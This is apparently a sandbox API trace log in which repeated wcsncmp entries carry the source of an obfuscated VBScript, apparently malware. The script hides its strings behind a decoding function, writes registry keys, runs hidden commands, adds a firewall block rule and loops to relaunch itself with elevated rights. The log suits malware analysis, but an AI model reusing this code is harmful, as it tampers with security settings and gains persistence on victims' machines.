56 [0226.371] wcsncmp (_String1="MEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.372] wcsncmp (_String1="EOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.372] wcsncmp (_String1="OFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.372] wcsncmp (_String1="FAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.372] wcsncmp (_String1="AEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd 